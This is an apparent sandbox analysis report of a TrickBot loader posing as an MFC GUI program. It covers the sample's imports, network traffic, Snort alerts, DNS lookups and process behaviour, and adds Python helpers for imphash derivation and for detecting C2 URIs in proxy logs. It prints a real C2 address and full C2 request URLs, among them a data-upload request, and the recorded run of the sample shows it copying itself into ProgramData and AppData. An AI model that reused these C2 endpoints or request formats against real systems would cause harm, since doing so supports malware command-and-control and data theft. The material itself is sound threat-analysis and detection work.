This import profile (GetTabbedTextExtentA, GrayStringA, UnpackDDElParam, WinHelpA, PropertySheetA, the printing and common-dialog APIs) together with the menu, dialog, cursor and bitmap resources is consistent with a statically linked MFC GUI application, which is the cover this loader wears. No networking library is imported (no WS2_32, WININET or WINHTTP), yet the sample talks TLS to 81.190.160.139:449 and api.ipify.org below, so that functionality is resolved at run time through the imported LoadLibraryA/GetProcAddress pair or lives in code that is unpacked later. VirtualAlloc and the resource APIs (FindResourceA, LoadResource, LockResource, SizeofResource) are present, which is what reading and staging an embedded payload needs.
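How the Import Hash value above is derived, as an added example (it is not pefile or Joe Sandbox code). It reproduces pefile's normalisation: DLL and function names are lowercased, only the extensions .dll, .ocx and .sys are dropped (so WINSPOOL.DRV hashes as winspool.drv), imports by ordinal become ord<N> (pefile additionally maps ws2_32 and oleaut32 ordinals to names through its lookup tables, which this example does not replicate), and the MD5 is taken over the comma-joined list in import-table order. IMPORT_TABLE is a constructed excerpt of the table above in the same DLL order, so its hash will not equal aec3fdbfe02c9ecb515e718ffdb039f8; feeding the complete table reproduces the report's value. The last helper makes the absence of any networking DLL explicit.

```python
"""Import-hash (imphash) derivation for a PE import table.
Added example reproducing pefile's normalisation rules; IMPORT_TABLE is a
constructed excerpt of this report's Imports table, not the full list."""
import hashlib

# pefile drops only these extensions before hashing; anything else is kept
STRIPPED_EXTENSIONS = {"dll", "ocx", "sys"}
# libraries whose presence would indicate statically imported networking code
NETWORK_DLLS = {"ws2_32", "wsock32", "wininet", "winhttp", "urlmon", "dnsapi"}

# (DLL, [imports]) in import-table order; a str is a name, an int an ordinal.
# Constructed excerpt of the table above, deliberately incomplete.
IMPORT_TABLE = [
    ("KERNEL32.dll", ["SetStdHandle", "CompareStringW", "LoadLibraryA",
                      "GetProcAddress", "GetVersion", "VirtualAlloc"]),
    ("USER32.dll", ["RedrawWindow", "SetCursorPos", "GetTabbedTextExtentA"]),
    ("GDI32.dll", ["SetBkMode", "SetPolyFillMode"]),
    ("comdlg32.dll", ["PrintDlgA", "GetFileTitleA"]),
    ("WINSPOOL.DRV", ["OpenPrinterA", "DocumentPropertiesA", "ClosePrinter"]),
    ("ADVAPI32.dll", ["RegCreateKeyA", "SetFileSecurityA"]),
    ("SHELL32.dll", ["SHGetFileInfoA", "DragQueryFileA"]),
    ("COMCTL32.dll", ["PropertySheetA", "DestroyPropertySheetPage"]),
]


def normalize_dll(name: str) -> str:
    """Lowercase the library name and drop a .dll/.ocx/.sys extension only."""
    lib = name.lower()
    base, dot, ext = lib.rpartition(".")
    return base if dot and ext in STRIPPED_EXTENSIONS else lib


def import_string(table) -> str:
    """The comma-joined 'lib.function' list that gets hashed, in table order.
    Ordinal imports are rendered as ord<N>; pefile would resolve ordinals of
    ws2_32 and oleaut32 to names first, which is not replicated here."""
    parts = []
    for dll, imports in table:
        lib = normalize_dll(dll)
        for imp in imports:
            if isinstance(imp, int):
                parts.append(f"{lib}.ord{imp}")
            else:
                parts.append(f"{lib}.{imp.lower()}")
    return ",".join(parts)


def imphash(table) -> str:
    """MD5 hex digest of the normalised import string."""
    return hashlib.md5(import_string(table).encode()).hexdigest()


def imported_network_dlls(table):
    """Networking libraries present in the import table (sorted, normalised)."""
    return sorted({normalize_dll(dll) for dll, _ in table} & NETWORK_DLLS)


if __name__ == "__main__":
    print("import string:", import_string(IMPORT_TABLE))
    print("imphash of excerpt:", imphash(IMPORT_TABLE))
    print("network DLLs imported:", imported_network_dlls(IMPORT_TABLE) or "none")
```

Two consequences for pivoting on the hash: it depends on import-table order, so two builds with the same API set in a different order hash differently, and an MFC-style table like this one is shared by many benign applications, so an imphash match is a clustering hint rather than a family signature.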

                        Exports

Name | Ordinal | Address
Func1 | 1 | 0x403000

An export table is unusual for an EXE with a GUI subsystem; the single export sits inside .text.

                        Possible Origin

Language of compilation system: English
Country where language is spoken: United States

                        Network Behavior

                        Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/23/19-11:34:31.368386 | TCP | 2404342 | ET CNC Feodo Tracker Reported CnC Server TCP group 22 | 49163 | 449 | 192.168.1.16 | 81.190.160.139
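Detection logic for the request shape visible in the three 81.190.160.139:449 URLs of the "URLs from Memory and Binaries" table and in the port-449 session that triggered the Feodo Tracker alert above, as an added example (it is not Joe Sandbox or Emerging Threats code). It parses <gtag>/<client id>/<command>/<argument> URIs, splits the client id into machine name, Windows version and bot id, and runs over a constructed proxy log excerpt. The command labels are the commonly documented TrickBot meanings and the log line format is an assumption; neither comes from the report.

```python
"""Parse and flag TrickBot-style C2 request URIs of the form
https://<host>:<port>/<gtag>/<client id>/<command>/<argument>.
Added example; the log excerpt is constructed and the command labels are
the commonly documented meanings, not facts stated in the report."""
import re
from typing import Optional

C2_URI = re.compile(
    r"^https?://(?P<host>[^/:]+)(?::(?P<port>\d+))?"
    r"/(?P<gtag>[a-z]{2,6}\d{1,3})"        # campaign tag, e.g. mor27
    r"/(?P<client>[^/]+)"                   # <MACHINE>_W<osver>.<32 hex>
    r"/(?P<cmd>\d{1,3})"                    # numeric command id
    r"/(?P<arg>[^\s]*)$"
)
CLIENT_ID = re.compile(r"^(?P<name>[^_]+)_W(?P<osver>\d{5,8})\.(?P<id>[0-9A-F]{32})$")

# Commonly documented meanings of the command ids that appear in this report
COMMAND_LABELS = {
    5: "module request",
    14: "data upload",
    23: "config request (argument is the bot's current config version)",
}


def decode_os_version(osver: str) -> str:
    """'617601' -> '6.1 build 7601' (Windows 7 SP1, the analysis VM).
    Assumption: one-digit major, one-digit minor, rest is the build number;
    other lengths are returned unchanged rather than guessed."""
    if len(osver) == 6:
        return f"{osver[0]}.{osver[1]} build {osver[2:]}"
    return osver


def parse_c2_uri(url: str) -> Optional[dict]:
    """Return the decoded fields for a matching URI, None for anything else."""
    m = C2_URI.match(url.strip())
    if not m:
        return None
    c = CLIENT_ID.match(m["client"])
    if not c:
        return None  # path shape fits but the client id does not: not this pattern
    cmd = int(m["cmd"])
    return {
        "host": m["host"],
        "port": int(m["port"]) if m["port"] else 443,
        "gtag": m["gtag"],
        "machine": c["name"],
        "os_version": c["osver"],
        "os_decoded": decode_os_version(c["osver"]),
        "bot_id": c["id"],
        "command": cmd,
        "label": COMMAND_LABELS.get(cmd, "unknown"),
        "argument": m["arg"].rstrip("/"),
    }


# Constructed proxy log excerpt: "<time> <client> <method> <url> <status>".
# Lines 1-2 carry URLs recovered from the sample's memory; 3-4 are decoys.
SAMPLE_LOG = """\
2019-10-23T09:34:31Z 192.168.1.16 POST https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/14/path/C:%5CUsers% 200
2019-10-23T09:34:45Z 192.168.1.16 GET https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/23/1000477/ 200
2019-10-23T09:35:17Z 192.168.1.16 GET https://api.ipify.org/?format=text 200
2019-10-23T09:35:20Z 192.168.1.22 GET https://example.com/app/user_W617601.00000000000000000000000000000000/1/x/ 200
"""


def scan_proxy_log(text: str):
    """(client ip, decoded request) for every log line whose URL matches."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        parsed = parse_c2_uri(fields[3])
        if parsed:
            hits.append((fields[1], parsed))
    return hits


if __name__ == "__main__":
    for client, req in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {req['host']}:{req['port']} gtag={req['gtag']} "
              f"cmd={req['command']} ({req['label']}) arg={req['argument']!r}")
```

The pattern is deliberately narrow: a TLS port other than 443 is not required (the URIs are only visible with TLS inspection or from memory), but the gtag, the W<osver>.<32 hex> client id and a numeric command segment must all be present, so ordinary REST paths do not match. The same fields feed pivots: one gtag groups a distribution campaign, one bot id groups every request from one infected host.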

                        Network Port Distribution

                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2019 11:34:31.368386030 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:31.581300974 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:31.581525087 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:31.586631060 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:31.801567078 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:31.808969021 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:31.809015036 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:31.809250116 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:31.836720943 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:32.048755884 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:32.256390095 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:45.497617006 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:34:45.750281096 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:50.605427027 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:34:50.815824032 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:16.906105042 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.002166986 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.002470016 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.004559040 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.100501060 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100855112 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100868940 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100879908 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100928068 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100940943 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100958109 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100970030 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.100981951 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.101032972 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.101198912 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.102089882 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.102103949 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.102327108 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.197134018 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.197175026 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.197396994 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.220766068 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.317312002 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.378602028 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.486155987 CEST | 443 | 49164 | 23.23.229.94 | 192.168.1.16
Oct 23, 2019 11:35:17.487457991 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:17.690907001 CEST | 49164 | 443 | 192.168.1.16 | 23.23.229.94
Oct 23, 2019 11:35:17.697981119 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:32.525871038 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:32.738328934 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:34.112720013 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:34.324527979 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:52.529810905 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:52.533471107 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:52.744446993 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:58.578116894 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:35:58.670531034 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:35:58.881418943 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:36:07.779083014 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:36:07.786429882 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139
Oct 23, 2019 11:36:07.998950958 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:36:14.846693039 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:36:14.846764088 CEST | 449 | 49163 | 81.190.160.139 | 192.168.1.16
Oct 23, 2019 11:36:14.847223043 CEST | 49163 | 449 | 192.168.1.16 | 81.190.160.139

Two sessions are interleaved here. The first SYN from 49163 to 81.190.160.139:449 at 11:34:31.368 is the packet the Snort rule above fired on, and that single connection stays open for the rest of the run with short exchanges every few seconds to half a minute, the rhythm of a beacon rather than a download. The 49164 to 23.23.229.94:443 exchange at 11:35:17 is one short TLS session: the api.ipify.org external-IP lookup (see DNS Answers). Port 449 for TLS is itself a useful network indicator, since nothing legitimate on the analysis system uses it.

                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2019 11:34:33.497194052 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:34:33.520772934 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:34:34.488578081 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:34:34.512100935 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:34:35.488744974 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:34:35.512242079 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:34:37.488519907 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23,  2019 11:34:37.512154102 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:34:41.488066912 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:34:41.511527061 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:35:16.820647001 CEST | 63322 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:35:16.852674007 CEST | 53 | 63322 | 8.8.8.8 | 192.168.1.16
Oct 23, 2019 11:35:16.879141092 CEST | 63801 | 53 | 192.168.1.16 | 8.8.8.8
Oct 23, 2019 11:35:16.902837992 CEST | 53 | 63801 | 8.8.8.8 | 192.168.1.16

Only the two exchanges at 11:35:16 (source ports 63322 and 63801) appear in the DNS Queries and DNS Answers tables below; the five exchanges on source port 53666 between 11:34:33 and 11:34:41 have no entry there, so the DNS tables should not be read as a complete record of the run's name resolution. Note also that the C2 connection to 81.190.160.139 at 11:34:31 was preceded by no DNS lookup at all: the address is hard-coded, which is typical for this family and leaves no DNS indicator to alert on.

                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 23, 2019 11:35:16.820647001 CEST | 192.168.1.16 | 8.8.8.8 | 0x894d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)
Oct 23, 2019 11:35:16.879141092 CEST | 192.168.1.16 | 8.8.8.8 | 0xd359 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001)

                        DNS Answers

                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.229.94 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.83.153 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.243.154 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.73.124 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 174.129.199.232 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.92.64 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.187.248 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.852674007 CEST | 8.8.8.8 | 192.168.1.16 | 0x894d | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.243.147.226 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | api.ipify.org | nagano-19599.herokussl.com | | CNAME (Canonical name) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | nagano-19599.herokussl.com | elb097307-934924932.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.73.124 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.243.154 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 50.19.218.16 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.83.153 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 23.23.229.94 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.225.92.64 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.235.187.248 | A (IP address) | IN (0x0001)
                        Oct 23, 2019 11:35:16.902837992 CEST | 8.8.8.8 | 192.168.1.16 | 0xd359 | No error (0) | elb097307-934924932.us-east-1.elb.amazonaws.com | | 54.243.147.226 | A (IP address) | IN (0x0001)

                        HTTPS Packets

                        Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                        Oct 23, 2019 11:35:17.197134018 CEST | 23.23.229.94 | 443 | 192.168.1.16 | 49164 | CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated | CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Jan 24 01:00:00 CET 2018 | Sun Jan 24 00:59:59 CET 2021 | |
                        | | | | | CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Wed Feb 12 01:00:00 CET 2014 | Mon Feb 12 00:59:59 CET 2029 | |
                        | | | | | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020 | |
                        | | | | | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020 | |

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Memory Usage

                        High Level Behavior Distribution

                        Behavior

                        System Behavior

                        General

                        Start time:11:33:30
                        Start date:23/10/2019
                        Path:C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe'
                        Imagebase:0x400000
                        File size:512000 bytes
                        MD5 hash:0A8D5A301D1EA44D5721045EEA07FDCD
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:11:33:31
                        Start date:23/10/2019
                        Path:C:\ProgramData\??????.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\ProgramData\??????.exe'
                        Imagebase:0x400000
                        File size:512000 bytes
                        MD5 hash:0A8D5A301D1EA44D5721045EEA07FDCD
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:11:34:08
                        Start date:23/10/2019
                        Path:C:\Users\user\AppData\Roaming\HomeLan\??????.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\AppData\Roaming\HomeLan\??????.exe
                        Imagebase:0x400000
                        File size:512000 bytes
                        MD5 hash:0A8D5A301D1EA44D5721045EEA07FDCD
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Trickbot_1, Description: Yara detected Trickbot, Source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                          Execution Graph

                          Execution Coverage:2.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:3.3%
                          Total number of Nodes:633
                          Total number of Limit Nodes:23

                          Graph

                          execution_graph [interactive graph view: 633 nodes, 23 limit nodes; node and edge listing not reproducible as text]

                          Executed Functions

                          Control-flow Graph

                          • Block 242: 432740-4327f1, GetVersion; successors 244, 245
                          • Block 244: 4327f3-432802, GetProcessVersion; successor 245
                          • Block 245: 432805-432807, call 41cbb0; successor 247
                          • Block 247: 43280c-43284c, call 41cb6c, LoadCursorA * 2
                          C-Code - Quality: 90%
                          			E00432740() {
                          				unsigned int _t18;
                          				intOrPtr _t19;
                          				intOrPtr _t26;
                          				long _t28;
                          				void* _t40;
                          				void* _t50;
                          
                          				_t50 = 0x44b2f8;
                          				_t18 = GetVersion();
                          				 *0x0044B34C = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
                          				 *0x0044B350 = _t18 >> 0x1f;
                          				asm("sbb eax, eax");
                          				_t40 = 1;
                          				_t19 = _t18 + 1;
                          				 *0x0044B354 = _t19;
                          				 *0x0044B358 = _t40 - _t19;
                          				 *0x0044B35C = _t19;
                          				 *0x0044B360 = 0;
                          				if(_t19 != 0) {
                          					_t28 = GetProcessVersion(0); // executed
                          					asm("sbb eax, eax");
                          					 *((intOrPtr*)(0x44b360)) = _t28 + 1;
                          				}
                          				E0041CBB0(_t50);
                          				 *((intOrPtr*)(_t50 + 0x24)) = 0;
                          				E0041CB6C(_t50);
                          				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
                          				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
                          				 *((intOrPtr*)(_t50 + 0x50)) = 0;
                          				 *((intOrPtr*)(_t50 + 0x44)) = 0;
                          				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
                          				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
                          				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
                          				return _t50;
                          			}









                          Instruction addresses (side column of the listing above, one per source line):
                          0x004327b5 0x004327b7 0x004327ce 0x004327d8 0x004327db 0x004327dd 0x004327de 0x004327e5 0x004327e8 0x004327eb
                          0x004327ee 0x004327f1 0x004327f4 0x004327ff 0x00432802 0x00432802 0x00432807 0x0043280e 0x00432811 0x0043282a
                          0x0043282f 0x00432837 0x0043283a 0x00432841 0x00432842 0x00432845 0x0043284c

                          APIs
                          • GetVersion.KERNEL32(?,?,?,0043273B), ref: 004327B7
                          • GetProcessVersion.KERNELBASE(00000000,?,?,?,0043273B), ref: 004327F4
                          • LoadCursorA.USER32(00000000,00007F02), ref: 00432822
                          • LoadCursorA.USER32(00000000,00007F00), ref: 0043282D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CursorLoadVersion$Process
                          • String ID:
                          • API String ID: 2246821583-0
                          • Opcode ID: 8a5051f1ed75182f01f0a67070f95fb9b0ac16b6985a4add2b8df3fbe6d2daf8
                          • Instruction ID: f323f69644bcdc42c1d938070534c4365bcbfff97e1d805a440205eadf2d6d13
                          • Opcode Fuzzy Hash: 8a5051f1ed75182f01f0a67070f95fb9b0ac16b6985a4add2b8df3fbe6d2daf8
                          • Instruction Fuzzy Hash: 9A118FB1A047108FD728DF3A988452ABBE5FB487047504D3FE187C7B80D7B8E4408B98
                          Uniqueness Score: -1.00%
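What E00432740 stores in the 0x44B34C..0x44B360 globals is version information, not anything specific to the sample: GetVersion() packs the OS major version in its low byte, the minor version in the next byte and the build number in the high word, with bit 31 set on Win9x/Win32s; GetProcessVersion(0) returns the subsystem version the image was linked for as major << 16 | minor; and 0x7F00 / 0x7F02 are IDC_ARROW / IDC_WAIT. This is the shape of MFC's afxData initialisation, so the function is runtime boilerplate. The decoder below is an added example (not code from the sample, from this page or from Joe Sandbox); which global receives which flag is my reading of the decompiled stores and is an assumption. One caveat for the reader: the listing derives both bytes of the 0x44B34C value from the low byte of GetVersion(), whereas the usual MFC form combines the major and minor bytes, so that line is worth checking against the disassembly before relying on it.

```python
from dataclasses import dataclass

# Added example: decode the DWORDs returned by GetVersion() and
# GetProcessVersion(0) into the six flags that E00432740 stores.  The field
# layout of the two DWORDs is documented Win32 behaviour; the mapping of each
# flag onto a particular global (comments below) is an assumption drawn from
# the decompiled listing.


@dataclass(frozen=True)
class AfxVersionData:
    win_ver: int         # major << 8 | minor      (store to 0x44B34C)
    is_win9x: bool       # bit 31 of GetVersion()  (store to 0x44B350)
    win4_or_later: bool  # major >= 4              (store to 0x44B354)
    not_win4: bool       # 1 - win4_or_later       (store to 0x44B358)
    sm_caption: bool     # == win4_or_later        (store to 0x44B35C)
    marked4: bool        # subsystem >= 4.0        (store to 0x44B360)


def decode_getversion(dw: int) -> tuple:
    """Split a GetVersion() DWORD into (major, minor, build, is_win9x).

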